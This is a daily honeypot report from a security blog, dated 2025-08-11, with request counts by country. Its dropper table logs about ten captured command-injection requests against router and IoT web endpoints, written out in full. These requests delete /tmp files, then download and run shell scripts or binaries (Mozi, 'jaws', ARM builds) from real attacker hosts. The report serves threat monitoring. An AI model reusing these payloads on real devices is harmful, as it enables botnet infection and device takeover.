Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-11

·304 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-11
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 10 stage 1 IP address(es), linked to 8 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 476 requests were recorded during the day, originating from 10 different countries, with a peak of 153 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.156.87.165GET /board.cgi?cmd=wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.dcn.sh%7Csh%3B HTTP/1.0
47.102.185.146GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /shell?busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vcp.sh%7Csh%26 HTTP/1.1
45.156.87.165GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1
8.219.238.211GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
156.196.120.75GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%3B%60 HTTP/1.1
45.153.34.251GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/45.9.2.5/arm7;chmod+777+arm7;./arm7+arm7;wget+http:/\x5C/45.9.2.5/arm;chmod+777+arm;./arm+arm;wget+http:/\x5C/45.9.2.5/arm4;chmod+777+arm4;./arm4+arm7;wget+http:/\x5C/45.9.2.5/arm5;chmod+777+arm5;./arm5+arm5;wget+http:/\x5C/45.9.2.5/arm6;chmod+777+arm6;./arm6+arm6 HTTP/1.1
117.209.24.191GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.209.24.191:45070/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
197.36.47.59GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2101\x00\x0E\x08.\xDEsQ}n\xA8a\x00\x00\x00\x00\x00
2111\x00\x0E8.\xDEsQ}n\xA8a\x00\x00\x00\x00\x00
2121\x00\x0E\x08\x12\xF7<c\xA5\x82\x22\xAC\x00\x00\x00\x00\x00
2131\x00\x0E8\x12\xF7<c\xA5\x82\x22\xAC\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0153US
182BG
249GB
348HK
422DE
520RO
614NL
714IN
811PL
910FR
1010SC
116SG
125CA
134ZA
143LT
153BR
163CN
172RU
182IT
192VN
202IR
212CH
222EG
231ES
241PA
251AZ
261KR
271SE
281KE
291BE

Related

Report: 2025-08-10
·316 words
Repport Daily
Report: 2025-08-09
·293 words
Repport Daily
Report: 2025-08-08
·332 words
Repport Daily